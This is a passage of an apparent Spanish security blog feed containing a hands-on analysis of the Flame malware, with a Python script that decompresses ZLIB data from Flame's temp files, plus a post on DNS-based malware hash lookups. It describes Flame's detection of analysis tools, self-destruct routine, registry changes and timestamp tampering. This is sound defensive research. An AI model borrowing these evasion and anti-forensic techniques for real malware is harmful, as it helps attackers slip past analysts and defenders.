<p>El porqué de utilizar esta herramienta, y no otra, es debido a que quería “simular”, en la medida de lo posible, un error a través de un controlador, y no realizar una petición de volcado directamente desde alguna herramienta forense. Con esta acción, lo que intento es pasar desapercibido ante controles internos monitorizados por el Malware.</p>
<p>Una vez extraído el volcado de memoria, utilicé la archiconocida Volatility, para extraer el contenido de la memoria del proceso RUNDLL32, y rezar para ver algún contenido que me hiciese comprender el porqué de mi error.</p>
<p>Analizando el espacio de memoria utilizado por RUNDLL32, se hizo la luz…..</p>
<p>Parece ser, que en el código de Flame se encuentra una lista de aplicaciones consideradas “peligrosas” para el Malware. Si alguna de estas aplicaciones se encuentra en ejecución en el sistema, éste automáticamente se para.</p>
<p>Este control, parece que se establece a través de varias órdenes. Una de ellas se puede visualizar a través de la siguiente imagen:</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/strings.png" target="_blank"><img class="size-medium wp-image-953 aligncenter" title="Strings" src="https://windowstips.files.wordpress.com/2012/06/strings.png?w=300&#038;h=280" alt="" width="300" height="280" /></a></p>
<p style="text-align:center;">Imagen 1.- Código malicioso</p>
<p>Existen otras clases muy interesantes. Algunas de ellas son las siguientes:</p>
<ul>
<li>LUA.CLAN.THREATENING_PROGRAMS</li>
<li>HEADACHE.BoostConsumer</li>
<li>GADGET.BEETLEJUICE_DATA_COLLECTOR_CONSUMER</li>
</ul>
<p>La lista de aplicaciones es importante. Como podéis ver en la imagen siguiente, se encuentran numerosas aplicaciones conocidas por analistas y administradores de sistemas.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/programs.png" target="_blank"><img class="size-medium wp-image-954 aligncenter" title="programs" src="https://windowstips.files.wordpress.com/2012/06/programs.png?w=300&#038;h=174" alt="" width="300" height="174" /></a></p>
<p style="text-align:center;">Imagen 2.- Algunas aplicaciones listadas por Flame</p>
<p>Como curiosidad, en una de las listas aparecen algunas soluciones de Antimalware. Imagino que Flame hace uso de estas rutinas para poder explotar mejor algunas de las vías de infección que utiliza.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/security1.png" target="_blank"><img class="size-medium wp-image-955 aligncenter" title="security1" src="https://windowstips.files.wordpress.com/2012/06/security1.png?w=300&#038;h=260" alt="" width="300" height="260" /></a></p>
<p style="text-align:center;">Imagen 3.- Soluciones Antimalware listadas por Flame</p>
<p>Qué fallaba al intentar analizar la muestra?. Fallaba en uno de los trucos más viejos utilizado por el Malware, ya que yo tenía corriendo en la máquina Wireshark para capturar paquetes, y Process Monitor (procmon.exe) para monitorizar llamadas de sistema. Todo ello arrancado y esperando a la ejecución de Flame. FAIL!</p>
<p>Por otra parte, si se detecta algo “extraño”, Flame tiene opciones de auto destrucción. Según los analistas, esta clase es ejecutada de forma remota, y se concentra todo en una función llamada SUICIDE, la cual parece que está destinada a parar las acciones del Malware, así como a destruir posibles evidencias futuras.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/suicide.png"><img class="size-medium wp-image-956 aligncenter" title="suicide" src="https://windowstips.files.wordpress.com/2012/06/suicide.png?w=235&#038;h=300" alt="" width="235" height="300" /></a></p>
<p style="text-align:center;">Imagen 4.- Código SUICIDE</p>
<p>Una vez revisada de nuevo toda la información, me dispuse a renombrar toda aplicación que tuviese en la máquina para monitorizar la muestra, y así sí…. Flame inicia el vuelo sin importarle el idioma ni el sistema operativo.</p>
<p>Una vez arrancado, éste comprueba si existe el directorio MSSecurityMgr, situado en el directorio Program Files\Common Files. Si no existe, crea este directorio.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/shared.png"><img class="size-medium wp-image-957 aligncenter" title="shared" src="https://windowstips.files.wordpress.com/2012/06/shared.png?w=300&#038;h=20" alt="" width="300" height="20" /></a></p>
<p style="text-align:center;">Imagen 5.- Creación del directorio Shared</p>
<p>Una vez creado el directorio, genera una serie de ficheros, los cuales se muestran en la siguiente imagen:</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/shared1.png"><img class="size-medium wp-image-958 aligncenter" title="shared1" src="https://windowstips.files.wordpress.com/2012/06/shared1.png?w=300&#038;h=51" alt="" width="300" height="51" /></a></p>
<p style="text-align:center;">Imagen 6.- Ficheros generados por Flame</p>
<p>Para poder ver con mayor claridad quien se encuentra tocando estos ficheros, he utilizado la herramienta de Sysinternals Process Explorer, buscando las referencias (handle) al mismo. Para este paso, también se podría haber utilizado la herramienta, también de Sysinternals, Handle.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/procexp.png" target="_blank"><img class="size-medium wp-image-961 aligncenter" title="ProceXp" src="https://windowstips.files.wordpress.com/2012/06/procexp.png?w=300&#038;h=224" alt="" width="300" height="224" /></a></p>
<p style="text-align:center;">Imagen 7.- Proceso services.exe con handle a mscrypt.dat</p>
<p>Una vez generado el directorio y los ficheros, se empiezan a generar consultas al árbol de registro HKLM, en concreto a la siguiente clave:</p>
<p style="text-align:center;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit</p>
<p>Después de realizar varias consultas, carga bibliotecas específicas relacionadas con la configuración de seguridad del sistema, tales como NTMARTA.DLL y SAMLIB.DLL, y modifica las claves de registro DefaultIdentifier y LastUsedIdentifier.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/regedit1.png"><img class="size-medium wp-image-959 aligncenter" title="regedit1" src="https://windowstips.files.wordpress.com/2012/06/regedit1.png?w=300&#038;h=74" alt="" width="300" height="74" /></a></p>
<p style="text-align:center;">Imagen 8.- Modificación de la configuración de seguridad</p>
<p>A los pocos minutos de la ejecución, y viendo la cantidad de información que va &#8220;depositando&#8221; el bicho, intento identificar algunos ficheros generados por Flame, utilizando para ello la herramienta de <a href="http://technet.microsoft.com/en-us/sysinternals/bb897441.aspx" target="_blank">Sysinternals sigcheck</a>. Un extracto de la salida se puede ver en la siguiente imagen:</p>
<p style="text-align:center;"><a href="https://windowstips.files.wordpress.com/2012/06/sigcheck.png"><img class="size-medium wp-image-960 aligncenter" title="sigcheck" src="https://windowstips.files.wordpress.com/2012/06/sigcheck.png?w=300&#038;h=67" alt="" width="300" height="67" /></a>Imagen 9.- Verificación de firma con Sigcheck</p>
<p>Durante todo el tiempo que se estuvo ejecutando Flame, éste generó multitud de ficheros temporales en el directorio TEMP del sistema (C:\Windows). Estos ficheros, en un principio, no se encuentran manejados por ningún proceso en particular, y sólo se utilizan en un instante determinado.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/temp.png"><img class="size-medium wp-image-962 aligncenter" title="temp" src="https://windowstips.files.wordpress.com/2012/06/temp.png?w=300&#038;h=135" alt="" width="300" height="135" /></a></p>
<p style="text-align:center;">Imagen 10.- Creación de ficheros temporales utilizados por Flame</p>
<p>Según el documento inicial de análisis de Flame, uno de los ficheros temporales, concretamente el fichero ~HLV473.tmp, contiene una lista de los procesos que se encuentran en ejecución. En el documento, se muestran secuencias de datos que hacen alusión a un formato de compresión llamado ZLIB.</p>
<p>Analizando este fichero, efectivamente se encuentran este tipo de secuencia de datos, por lo que me pongo a jugar con la biblioteca ZLIB de Python.</p>
<p>A la hora de generar un fichero con ZLIB en python, es posible indicar el grado de compresión con un valor numérico que va desde el 0 al 9. Generando un fichero con el valor 9 (Compresión máxima), las secuencias de datos que se muestran en el nuevo fichero, coinciden con las del fichero ~HLV473.tmp.</p>
<p>Aplicando un sencillo script en Python (En batch no he podido! <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ), es posible &#8220;ver&#8221; ciertos datos almacenados en este fichero.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/script.png" target="_blank"><img class="size-medium wp-image-963 aligncenter" title="script" src="https://windowstips.files.wordpress.com/2012/06/script.png?w=300&#038;h=51" alt="" width="300" height="51" /></a></p>
<p style="text-align:center;">Imagen 11.- Extracción de información comprimida en ZLIB</p>
<p>La forma de implementarlo ha sido bastante sencilla. Para extraer todas las secuencias de datos que coincidan con ZLIB y los métodos de compresión (Mínimo al Máximo) he implementado un FOR del 0 al 9 y generado 10 ficheros. Una vez realizado este paso, he extraído la secuencia inicial (Magic), y he implementado un cutre-script para poder leerlo. El cutre código, aquí:</p>
<pre class="brush: python; title: ; notranslate">
#-------------------------------------------------------------------------------
# Name:        Flame Zlib
# Purpose:
#
# Author:      Silverhack
#
# Created:     11/06/2012
# Blog:   http://windowstips.wordpress.com
# Reference: www.crysys.hu/skywiper/skywiper.pdf
#-------------------------------------------------------------------------------
import zlib
import sys
from optparse import OptionParser
from optparse import OptionGroup

magic = [&quot;\x78\x01&quot;,&quot;\x78\x5e&quot;,&quot;\x78\xda&quot;,&quot;\x78\x9c&quot;]
offset = 0

def flame(fich):
    try:
        fread = open(fich,'rb').read()
        for i in reversed(magic):
            try:
                init_offset = offset
                while 1:
                    init_offset+=fread[init_offset:].index(i)

                    if init_offset &gt;=0:
                        try:
                            print zlib.decompress(fread[init_offset:])
                            break
                        except:
                            init_offset+=1
            except:
                pass

    except IOError:
        print &quot;No such file or directory....&quot;
        sys.exit()

def main():
    #set up command-line options
    parser = OptionParser(description=&quot;Flame Zlib file read | http://windowstips.wordpress.com&quot;, version=&quot;FlameZlibRead 0.1&quot;)
    StandardExtractGroup = OptionGroup(parser, &quot;Read Section&quot;, &quot;Read files and search common ZLIB payloads&quot;)
    StandardExtractGroup.add_option(&quot;-f&quot;,&quot;--file&quot;,default=False,help=&quot;File name to perform search&quot;, action=&quot;store_true&quot;,dest=&quot;filename&quot;)
    parser.add_option_group(StandardExtractGroup)
    #grab options
    (options, args) = parser.parse_args()
    if options.filename:
        fflame =  args[0]
        flame(fflame)

if __name__ == '__main__':
    main()
</pre>
<p>Hasta la próxima!<br />
Referencias</p>
<p><a href="http://msdn.microsoft.com/en-us/library/bb499271(v=winembedded.51).aspx" target="_blank">http://msdn.microsoft.com/en-us/library/bb499271(v=winembedded.51).aspx</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/952/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/952/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=952&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/06/13/analisis-de-flame-parte-ii-la-primera-ejecucion/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/strings.png?w=300" medium="image">
			<media:title type="html">Strings</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/programs.png?w=300" medium="image">
			<media:title type="html">programs</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/security1.png?w=300" medium="image">
			<media:title type="html">security1</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/suicide.png?w=235" medium="image">
			<media:title type="html">suicide</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/shared.png?w=300" medium="image">
			<media:title type="html">shared</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/shared1.png?w=300" medium="image">
			<media:title type="html">shared1</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/procexp.png?w=300" medium="image">
			<media:title type="html">ProceXp</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/regedit1.png?w=300" medium="image">
			<media:title type="html">regedit1</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/sigcheck.png?w=300" medium="image">
			<media:title type="html">sigcheck</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/temp.png?w=300" medium="image">
			<media:title type="html">temp</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/script.png?w=300" medium="image">
			<media:title type="html">script</media:title>
		</media:content>
	</item>
		<item>
		<title>Análisis de Flame parte I. El FAIL</title>
		<link>http://windowstips.wordpress.com/2012/06/12/analisis-de-flame-parte-i-el-fail/</link>
		<comments>http://windowstips.wordpress.com/2012/06/12/analisis-de-flame-parte-i-el-fail/#comments</comments>
		<pubDate>Tue, 12 Jun 2012 10:21:16 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[forensics]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[conspiracy]]></category>
		<category><![CDATA[Flame]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=943</guid>
		<description><![CDATA[Hola a tod@s! Esta semana dedicaré una serie de entregas al análisis del Malware Flame. Espero que estas engregas sirvan para guiar al analista en su investigación, y que no cometa los mismos errores que estoy cometiendo yo! Desde principios de este mes se conoce de la existencia de un malware que está ocupando todas las portadas [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=943&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p>Esta semana dedicaré una serie de entregas al análisis del Malware Flame. Espero que estas engregas sirvan para guiar al analista en su investigación, y que no cometa los mismos errores que estoy cometiendo yo!</p>
<p>Desde principios de este mes se conoce de la existencia de un malware que está ocupando todas las portadas de los blogs más importantes dentro del panorama de la seguridad. Personalmente, me enteré de este “elemento” leyendo una <a href="http://unaaldia.hispasec.com/2012/05/theflame-reflexiones-sobre-otra.html" target="_blank">entrada en Hispasec</a> escrita por el genial Sergio de los Santos, y que me mantuvo entretenido buena parte de un trayecto en metro.</p>
<p>Como me picaba la curiosidad, esa misma noche, me puse a buscar alguna muestra del Malware, y fijar algún día en la agenda para “jugar” con la misma.</p>
<p>Antes siquiera de “jugar”, me encuentro con otra <a href="http://www.securitybydefault.com/2012/05/todo-sobre-flame-que-es-y-como.html" target="_blank">interesantísima entrada</a> de <a href="https://twitter.com/#%21/ldelgadoj" target="_blank">Luis Delgado</a>, en la que explica básicamente el funcionamiento del bicho, así como un <a href="http://www.ldelgado.es/?flamedetector" target="_blank">script en python</a>, el cual determina una infección, en base a consultas al registro, así como a ficheros residuales que deja el propio Malware.</p>
<p>Ese mismo día, y desde el blog de AlienVault, Jaime Blasco nos deleita con una <a href="http://labs.alienvault.com/labs/index.php/2012/how-old-is-flame/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=how-old-is-flame" target="_blank">interesantísima entrada</a>, hablando esta vez, de la posible &#8220;edad&#8221; del Malware. La muestra analizada por Jaime (MD5:bdc9e04388bda8527b398a8c34667e18), coincide con la que me dispongo a utilizar yo.</p>
<p>Días más tarde, me vuelvo a encontrar con otra <a href="http://www.securitybydefault.com/2012/06/flame-y-los-certificados-digitales.html" target="_blank">noticia del mismo elemento</a>, pero esta vez escrita por mi querido y siempre mordaz <a href="http://twitter.com/#!/YJesus" target="_blank">Yago</a>. En esta entrada, habla de Flame y los certificados digitales, lanzando una primera aproximación acerca de la función principal de esa firma digital.</p>
<p>Una vez leída y releída toda la documentación existente sobre el Malware Flame, me he dispuesto a realizar un pequeño análisis del mismo, sólo por morbosa curiosidad, y de momento, este es el resultado.</p>
<p>Según el <a href="http://www.crysys.hu/skywiper/skywiper.pdf" target="_blank">documento “oficial”</a>, en el que se explica los entresijos de este bicho, si se desea reproducir la infección en una máquina para su análisis, se pueden realizar dos operaciones, las cuales, ofrecerían el mismo resultado.</p>
<p>La primera, y la más rápida, es ejecutar el fichero a través de línea de comandos, registrando el OCX a través de la herramienta rundll32.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/start.png"><img class="size-medium wp-image-944 aligncenter" title="start" src="https://windowstips.files.wordpress.com/2012/06/start.png?w=300&#038;h=151" alt="" width="300" height="151" /></a></p>
<p align="center">Imagen 1.- Intentando arrancar Flame</p>
<p>La otra manera de arrancar la muestra, es ayudando al Malware a auto-ejecutarse en el próximo reinicio. Para llevar a cabo esta acción, se indica en el documento que Flame se carga como un proveedor de autenticación, tal y como se puede ver en la siguiente imagen:</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/auth.png" target="_blank"><img class="size-medium wp-image-945 aligncenter" title="auth" src="https://windowstips.files.wordpress.com/2012/06/auth.png?w=300&#038;h=197" alt="" width="300" height="197" /></a></p>
<p align="center">Imagen 2.- Detalles del Malware Flame</p>
<p>Para realizar esta acción, en el documento se especifica la clave de registro sobre la cual hay que adjuntar la muestra, para su posterior carga.</p>
<p align="center">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa</p>
<p>La máquina sobre la que me dispongo a realizar las pruebas de infección es un Windows XP Service Pack 3 en español 32 bits. El método de infección que escojo es el primero, es decir, registrando el Malware a través de línea de comandos, a través de rundll32.</p>
<p>Una vez ejecutado el comando, la herramienta rundll32.exe, logra arrancar el OCX. Observando el comportamiento a través de Process Monitor, me encuentro con que la primera acción que realiza el Malware, es establecer un valor aleatorio en la clave SEED de la siguiente ruta de registro:</p>
<p align="center">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG</p>
<p>El valor que reside en la clave SEED, es el valor que utiliza la CRYPTO API de Windows, a la hora de generar números aleatorios.</p>
<p>Las siguientes acciones derivan en la consulta de drivers instalados, así como consultas al directorio TEMP del Sistema.</p>
<p>Una vez que realiza todas estas consultas, el Malware genera un Log en el directorio Windows llamado Ef_trace.log. Un aspecto curioso de esta acción, me lo encuentro a la hora de comprobar cómo Flame cambia el Timestamp del fichero, lo que dificultaría su detección en un análisis forense, por ejemplo.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/logtimestamp.png"><img class="size-medium wp-image-946 aligncenter" title="LogTimeStamp" src="https://windowstips.files.wordpress.com/2012/06/logtimestamp.png?w=258&#038;h=300" alt="" width="258" height="300" /></a></p>
<p style="text-align:center;">Imagen 3.- Cambio de timestamp de fichero</p>
<p>Acto seguido, realiza operaciones de escritura sobre el mismo, tal y como se puede comprobar en la siguiente imagen:</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/log.png"><img class="size-medium wp-image-947 aligncenter" title="log" src="https://windowstips.files.wordpress.com/2012/06/log.png?w=300&#038;h=131" alt="" width="300" height="131" /></a></p>
<p style="text-align:center;">Imagen 4.- Escritura de fichero Ef_trace.log</p>
<p>A la hora de abrir este fichero, me encuentro con información cifrada, tal y como apuntan varios blogs de seguridad, que hacen mención al fichero en sí.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/trace.png"><img class="size-medium wp-image-948 aligncenter" title="trace" src="https://windowstips.files.wordpress.com/2012/06/trace.png?w=300&#038;h=87" alt="" width="300" height="87" /></a></p>
<p style="text-align:center;">Imagen 5.- Datos cifrados en Ef_trace.log</p>
<p>El siguiente movimiento de Flame es preguntar por los proveedores de autenticación, fecha y hora del sistema, parámetros relativos al nombre de máquina y configuración de red. Y cuando ha obtenido toda la información…. SE PARA!!</p>
<p>Como os podréis imaginar, mi cara de FAIL era un poema. Así que empiezo a tirar de documentación, para comprobar si había errado en algún movimiento. Las siguientes 3 ejecuciones se comportan de la misma manera a lo descrito en anteriores párrafos.</p>
<p>Analizando cada entrada arrojada por Process Monitor, me encuentro con una que me parece sospechosa, la cual se encuentra ya documentada por anteriores analistas. Cuando se intenta inicializar Flame, éste realiza una consulta a un directorio concreto, para ver si se encuentra un fichero. En la siguiente imagen podréis comprobar cómo la consulta devuelve un resultado de NOT FOUND.</p>
<p style="text-align:center;"><a href="https://windowstips.files.wordpress.com/2012/06/program.png"><img class="alignnone size-medium wp-image-949" title="program" src="https://windowstips.files.wordpress.com/2012/06/program.png?w=300&#038;h=16" alt="" width="300" height="16" /></a></p>
<p align="center">Imagen 6.- Consulta a controlador wavesetup3.drv</p>
<p>Como no sabía por donde tirar, elucubro la posibilidad de que pueda haber alguna incompatibilidad debida al idioma. Si el Malware está diseñado para Windows XP, puede haberla, ya que en versiones anteriores a Windows Vista, el idioma viene integrado en el Kernel.</p>
<p>Instalado el sistema en inglés, y ejecutando la muestra sobre éste, se comporta de la misma manera que el anterior. ¿En qué falla? ¿Qué estoy haciendo mal?</p>
<p>Tras una pausa (en la que me cagué en todo…), tiro de teléfono y llamo a <a href="http://twitter.com/#!/Seifreed" target="_blank">Seifreed</a>, buscando alguna orientación. Aprovecho para darle las gracias desde aquí, ya que en este paso fui mucho más rápido gracias a él.</p>
<p>Marc me comentó que él sí lo había podido lanzar sin ningún problema, y que su máquina de pruebas era un Windows XP SP2 en Spanish, lo cual me dejó totalmente sin ideas. En su ejecución, el malware había realizado conexiones y se había propagado con éxito en el equipo. Ni problema de idioma, ni Service Packs, ni hostias…..</p>
<p>Mañana publicaré la segunda parte de este relato, y descubriremos algunos mecanismos de seguridad que realiza Flame para poder ejecutarse en un entorno “controlado”….</p>
<p>Saludos a tod@s!!</p>
<p>Referencias</p>
<p><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa379942(v=vs.85).aspx" target="_blank">http://msdn.microsoft.com/en-us/library/windows/desktop/aa379942(v=vs.85).aspx</a></p>
<p><a href="http://www.crysys.hu/skywiper/skywiper.pdf" target="_blank">www.crysys.hu/skywiper/skywiper.pdf</a></p>
<p><cite></cite></p>
<p><cite></cite></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/943/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/943/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=943&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/06/12/analisis-de-flame-parte-i-el-fail/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/start.png?w=300" medium="image">
			<media:title type="html">start</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/auth.png?w=300" medium="image">
			<media:title type="html">auth</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/logtimestamp.png?w=258" medium="image">
			<media:title type="html">LogTimeStamp</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/log.png?w=300" medium="image">
			<media:title type="html">log</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/trace.png?w=300" medium="image">
			<media:title type="html">trace</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/program.png?w=300" medium="image">
			<media:title type="html">program</media:title>
		</media:content>
	</item>
		<item>
		<title>Información de Malware. ¿A través de DNS?</title>
		<link>http://windowstips.wordpress.com/2012/05/08/informacion-de-malware-a-traves-de-dns/</link>
		<comments>http://windowstips.wordpress.com/2012/05/08/informacion-de-malware-a-traves-de-dns/#comments</comments>
		<pubDate>Tue, 08 May 2012 06:58:26 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[Curiosidades]]></category>
		<category><![CDATA[forensics]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[análisis de malware]]></category>
		<category><![CDATA[fuentes de información]]></category>
		<category><![CDATA[investigación]]></category>
		<category><![CDATA[malware hash database]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=937</guid>
		<description><![CDATA[Hola a tod@s! Hoy día, y debido a que cada año crece más todo lo relativo a vías de infección, han proliferado muchos servicios de consulta de Malware, y todo lo relacionado con la muestra. Servicios como VirusTotal y ThreatExpert son buenas referencias a tener en cuenta, en tanto y cuanto a un auditor, le caiga [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=937&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p>Hoy día, y debido a que cada año crece más todo lo relativo a vías de infección, han proliferado muchos servicios de consulta de Malware, y todo lo relacionado con la muestra.</p>
<p>Servicios como <a href="www.virustotal.com" target="_blank">VirusTotal</a> y <a href="www.threatexpert.com" target="_blank">ThreatExpert</a> son buenas referencias a tener en cuenta, en tanto y cuanto a un auditor, le caiga el &#8220;marrón&#8221; de analizar un &#8220;bicho&#8221;.</p>
<p>A la hora de analizarlo, y viendo como está el mercado, en cuanto a horas reales y cuantificables que se dedican a un proyecto, a un auditor le puede solucionar la papeleta el consultar este tipo de servicios, a día de hoy imprescindibles y para mi gusto perfectos, para que le den una visión global sobre qué dicen las principales casas de antivirus sobre el mismo.</p>
<p>Buscando proyectos relacionados con el análisis dinámiso de muestras de manera online, y habiéndome leído la gran entrada de <a href="http://www.hackplayers.com/2012/04/recopilatorio-de-recursos-de-malware-de.html" target="_blank">HackPlayers sobre análisis de Malware</a>, me encontré con un proyecto en OWASP bastante interesante. Consulta de Malware en base a un MD5 o SHA1. Si miramos esta última frase con ojo crítico, pensaremos, nada nuevo no?</p>
<p>La solución que se aloja en OWASP, la cual puede consultarse de manera ONLINE, permite que puedas realizar consultas en base a un MD5 o SHA1 de algún fichero &#8220;sospechoso&#8221;, pero en vez de consultar a una Web, las consultas las realizas a través de peticiones DNS, adjuntando al final del MD5 o SHA1 un sufijo DNS.</p>
<p>La idea en sí es simple. Tener un repositorio de HASHES relacionados con ficheros maliciosos. Pero la ejecución cambia totalmente al ser consultas a través de DNS.</p>
<p>Desde un punto de vista &#8220;corporativo&#8221;, las consultas DNS se permitirán, casi por obligación. Como segundo punto es la información que obtenemos al realizar las consultas. Esta información va desde el supuesto tamaño de fichero que coincide con el HASH, así como información relativa al estatus de este. Si es Malware, desconocido, bueno, etc&#8230; Una de las respuestas más curiosas, es la relativa a la certeza. En la respuesta, dan un grado, en tanto por ciento, de lo cierto de que ese HASH sea Malware o no, en función del estatus, y de lo analizado.</p>
<p>Según el servicio, esta base de datos es mantenida con regularidad, y analizan bastantes muestras de ficheros maliciosos.</p>
<p>Para realizar una consulta, lo único que necesitamos es un cliente nslookup o dig.</p>
<p>Si lo que necesitamos es consultar si el HASH se encuentra incluido en la base de datos, se puede realizar una consulta de tipo A. La respuesta que obtendremos, en el caso de que el HASH se encuentre en la BBDD, es de 127.0.0.11.</p>
<p>En el caso de que se necesite extraer la información relativa al HASH, habrá que realizar la consulta, pero esta vez de tipo TXT, y añadiendo un sufijo específico, hash.sapao.net.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/05/sapao.png"><img class="size-medium wp-image-938 aligncenter" title="sapao" src="https://windowstips.files.wordpress.com/2012/05/sapao.png?w=300&#038;h=145" alt="" width="300" height="145" /></a></p>
<p style="text-align:center;">Imagen 1.- Consulta de HASH malicioso a través de DNS</p>
<p>Aunque desconocía por completo que se pudiesen realizar consultas de HASH a través de DNS, en la página del proyecto, existen enlaces a sitios y comunidades que ofrecen lo mismo. En el caso de Team Cymru&#8217;s, ofrecen el mismo servicio de consultas de HASH a través de DNS, operando de la misma manera que la anterior.</p>
<p>SANS, por su parte, tiene otro servicio muy similar, que, aunque no tan potente como los anteriores, tienen algo que lo hace bueno, y es que mantienen una base de datos de ficheros catalogados en WhiteList, por lo que, si se realizan consultas, se puede cotejar si un fichero es malicioso, o por el contrario se encuentra en una lista blanca.</p>
<p>Realizando una prueba con el MD5 un fichero, SANS me informa de que se encuentra listado en varias ocasiones. ¿Colisión? Por la pinta del tamaño, y viendo que son ficheros en texto plano, no sé, no sé&#8230;..</p>
<p><a href="https://windowstips.files.wordpress.com/2012/05/nist1.png"><img class="size-medium wp-image-939 aligncenter" title="nist1" src="https://windowstips.files.wordpress.com/2012/05/nist1.png?w=300&#038;h=88" alt="" width="300" height="88" /></a></p>
<p style="text-align:center;">Imagen 2.- Consulta realizada en NIST Hash Database</p>
<p>Si realizamos esta consulta, pero a través de NSLOOKUP, la respuesta que obtendríamos sería la siguiente:</p>
<p><a href="https://windowstips.files.wordpress.com/2012/05/sans.png"><img class="size-medium wp-image-940 aligncenter" title="sans" src="https://windowstips.files.wordpress.com/2012/05/sans.png?w=300&#038;h=145" alt="" width="300" height="145" /></a></p>
<p style="text-align:center;">Imagen 3.- Consulta de HASH a través de NSLOOKUP en SANS</p>
<p style="text-align:left;">Curiosa forma de consultar por ficheros maliciosos no?</p>
<p style="text-align:left;">No sólo de la password vive el HASH!</p>
<p style="text-align:left;">Saludos a tod@S!</p>
<p style="text-align:left;">
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/937/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/937/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=937&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/05/08/informacion-de-malware-a-traves-de-dns/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
